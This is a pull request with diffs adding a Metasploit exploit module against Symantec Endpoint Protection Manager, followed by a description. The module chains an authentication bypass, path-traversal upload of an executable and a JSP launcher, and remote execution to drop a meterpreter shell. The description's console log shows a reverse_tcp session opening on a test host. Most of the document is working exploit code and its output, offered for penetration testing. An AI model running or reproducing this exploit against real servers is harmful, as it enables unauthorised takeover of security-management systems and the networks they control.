### PR TITLE
Add the Symantec Endpoint Protection Manager auth bypass rce module

### DIFF
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -61,6 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote
     meterp = Rex::Text.rand_text_alpha(10)
     jsp = Rex::Text.rand_text_alpha(10)
 
+    print_status("Getting cookie")
+
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
@@ -81,6 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
 <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
     }
 
+    print_status("Uploading payload...")
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
@@ -95,6 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'ctype' => ''
     })
 
+    print_status("Uploading JSP page to execute the payload...")
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
@@ -109,6 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'ctype' => ''
     })
 
+    print_status("Executing payload. Manual cleanup will be required.")
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
     })

--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\'+meterp+'.exe").getInputStream()).useDelimiter("\\\\A").next()%>'
 
-    res = send_request_cgi({
+    send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
       'vars_get' => {
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'ctype' => ''
     })
 
-    res = send_request_cgi({
+    send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
       'vars_get' => {
@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'ctype' => ''
     })
 
-    res = send_request_cgi({
+    send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
     })
   end

--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "Symantec Endpoint Protection Manager Auth Bypass and RCE",
       'Description'    => %q{
-      This module exploits two separate vulnerabilities in Symantec Endpoint Protection Manager
-      in order to achieve a remote shell on the box.
+      This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
+      in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           ['CVE', '2015-1486'],
           ['CVE', '2015-1487'],
+          ['CVE', '2015-1489'],
           ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
         ],
       'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
@@ -41,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
             }
           } ],
         ],
-      'Privileged'     => false,
+      'Privileged'     => true,
       'DisclosureDate' => 'Jul 31 2015',
       'DefaultTarget'  => 0))
 
@@ -73,7 +74,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
     cookie = res.get_cookies
 
-    exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\'+meterp+'.exe").getInputStream()).useDelimiter("\\\\A").next()%>'
+    exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
+<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
+    }
 
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),

--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -65,7 +65,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
     cookie = res.get_cookies
 
-    p cookie
     exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\fdsa.exe").getInputStream()).useDelimiter("\\\\A").next()%>'
 
     res = send_request_cgi({

--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -67,6 +67,10 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
 
+    unless res
+      fail_with(Failure::Unknown, 'The server did not respond in an expected way')
+    end
+
     cookie = res.get_cookies
 
     exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\'+meterp+'.exe").getInputStream()).useDelimiter("\\\\A").next()%>'

--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -76,7 +76,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
     cookie = res.get_cookies
 
-    unless cookie || cookie == ''
+    if cookie == nil || cookie == ''
       fail_with(Failure::Unknown, 'The server did not return a cookie to use in the later requests.')
     end
 

--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -76,7 +76,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
     cookie = res.get_cookies
 
-    if not cookie || cookie == ''
+    unless cookie || cookie == ''
       fail_with(Failure::Unknown, 'The server did not return a cookie to use in the later requests.')
     end
 

--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -5,11 +5,10 @@
 
 require 'msf/core'
 
-class Metasploit3 < Msf::Exploit::Remote
+class Metasploit4 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::FileDropper
 
   def initialize(info={})
     super(update_info(info,
@@ -31,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote
           ['CVE', '2015-1489'],
           ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
         ],
-      'Payload'        => { 'BadChars' => "" },
       'DefaultOptions' => {
         'SSL' => true
       },
@@ -57,7 +55,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-
     meterp = Rex::Text.rand_text_alpha(10)
     jsp = Rex::Text.rand_text_alpha(10)
 

--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -84,8 +84,8 @@ class Metasploit4 < Msf::Exploit::Remote
 <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
     }
 
-    print_status("Uploading payload...")
-    send_request_cgi({
+    print_status('Uploading payload...')
+    res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
       'vars_get' => {
@@ -99,8 +99,12 @@ class Metasploit4 < Msf::Exploit::Remote
       'ctype' => ''
     })
 
+    unless res && res.code == 200
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
+    end
+
     print_status("Uploading JSP page to execute the payload...")
-    send_request_cgi({
+    res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
       'vars_get' => {
@@ -114,7 +118,11 @@ class Metasploit4 < Msf::Exploit::Remote
       'ctype' => ''
     })
 
-    print_status("Executing payload. Manual cleanup will be required.")
+    unless res && res.code == 200
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way.')
+    end
+
+    print_status('Executing payload. Manual cleanup will be required.')
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
     })

--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -1,0 +1,103 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Symantec Endpoint Protection Manager Auth Bypass and RCE",
+      'Description'    => %q{
+      This module exploits two separate vulnerabilities in Symantec Endpoint Protection Manager
+      in order to achieve a remote shell on the box.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'bperry', #metasploit module
+          'CodeWhiteSec' #discovery
+        ],
+      'References'     =>
+        [
+          ['CVE', '2015-1486'],
+          ['CVE', '2015-1487'],
+          ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
+        ],
+      'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', {
+            'Arch' => ARCH_X86,
+            'Payload' => {
+              'DisableNops' => true
+            }
+          } ],
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Jul 31 2015',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptBool.new('SSL', [true, 'Use SSL', true]),
+          OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
+        ], self.class)
+  end
+
+  def exploit
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
+      'method' => 'POST',
+      'vars_post' => {
+        'ActionType' => 'ResetPassword',
+        'UserID' => 'admin',
+        'Domain' => ''
+      }
+    })
+
+    cookie = res.get_cookies
+
+    p cookie
+    exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\fdsa.exe").getInputStream()).useDelimiter("\\\\A").next()%>'
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
+      'method' => 'POST',
+      'vars_get' => {
+        'ActionType' => 'BinaryFile',
+        'Action' => 'UploadPackage',
+        'PackageFile' => '../../../tomcat/webapps/ROOT/fdsa.exe',
+        'KnownHosts' => '.'
+      },
+      'data' => payload.encoded_exe,
+      'cookie' => cookie,
+      'ctype' => ''
+    })
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
+      'method' => 'POST',
+      'vars_get' => {
+        'ActionType' => 'BinaryFile',
+        'Action' => 'UploadPackage',
+        'PackageFile' => '../../../tomcat/webapps/ROOT/rewq.jsp',
+        'KnownHosts' => '.'
+      },
+      'data' => exec,
+      'cookie' => cookie,
+      'ctype' => ''
+    })
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'rewq.jsp')
+    })
+  end
+end

--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Author'         =>
         [
           'bperry', #metasploit module
-          'CodeWhiteSec' #discovery
+          'Markus Wulftange' #discovery
         ],
       'References'     =>
         [

--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -79,6 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote
 
     cookie = res.get_cookies
 
+    if not cookie || cookie == ''
+      fail_with(Failure::Unknown, 'The server did not return a cookie to use in the later requests.')
+    end
+
     exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
 <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
     }

--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -32,6 +32,9 @@ class Metasploit3 < Msf::Exploit::Remote
           ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
         ],
       'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
+      'DefaultOptions' => {
+        'SSL' => true
+      },
       'Platform'       => 'win',
       'Targets'        =>
         [
@@ -48,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
       register_options(
         [
-          OptBool.new('SSL', [true, 'Use SSL', true]),
+          Opt::RPORT(8443),
           OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
         ], self.class)
   end

--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -53,6 +53,10 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
+
+    meterp = Rex::Text.rand_text_alpha(10)
+    jsp = Rex::Text.rand_text_alpha(10)
+
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
@@ -65,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     cookie = res.get_cookies
 
-    exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\fdsa.exe").getInputStream()).useDelimiter("\\\\A").next()%>'
+    exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\'+meterp+'.exe").getInputStream()).useDelimiter("\\\\A").next()%>'
 
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
@@ -73,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'vars_get' => {
         'ActionType' => 'BinaryFile',
         'Action' => 'UploadPackage',
-        'PackageFile' => '../../../tomcat/webapps/ROOT/fdsa.exe',
+        'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe",
         'KnownHosts' => '.'
       },
       'data' => payload.encoded_exe,
@@ -87,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'vars_get' => {
         'ActionType' => 'BinaryFile',
         'Action' => 'UploadPackage',
-        'PackageFile' => '../../../tomcat/webapps/ROOT/rewq.jsp',
+        'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp",
         'KnownHosts' => '.'
       },
       'data' => exec,
@@ -96,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, 'rewq.jsp')
+      'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
     })
   end
 end

--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
           ['CVE', '2015-1489'],
           ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
         ],
-      'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
+      'Payload'        => { 'BadChars' => "" },
       'DefaultOptions' => {
         'SSL' => true
       },


### PR DESCRIPTION
This module exploits an auth bypass and arbitrary file write vuln in order to achieve unauthenticated remote code execution to drop and execute a meterpreter shell onto the box. The vulnerabilities are detailed here:
http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html

The trial available on the web is still vulnerable:

https://www4.symantec.com/Vrt/offer?a_id=77956

If for some reason this doesn't work, I have a vulnerable copy. Tested on Windows Server 2008.

```
msf exploit(sepm_auth_bypass_rce) > show options

Module options (exploit/windows/http/sepm_auth_bypass_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.18     yes       The target address
   RPORT      8443             yes       The target port
   SSL        true             yes       Use SSL
   TARGETURI  /                yes       The path of the web application
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.45     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(sepm_auth_bypass_rce) > exploit

[*] Started reverse handler on 192.168.1.45:4444 
[*] Sending stage (885806 bytes) to 192.168.1.18
[*] Meterpreter session 3 opened (192.168.1.45:4444 -> 192.168.1.18:49614) at 2015-08-01 16:42:43 -0500

meterpreter > getuid
Server username: NT SERVICE\semsrv
meterpreter > 
```
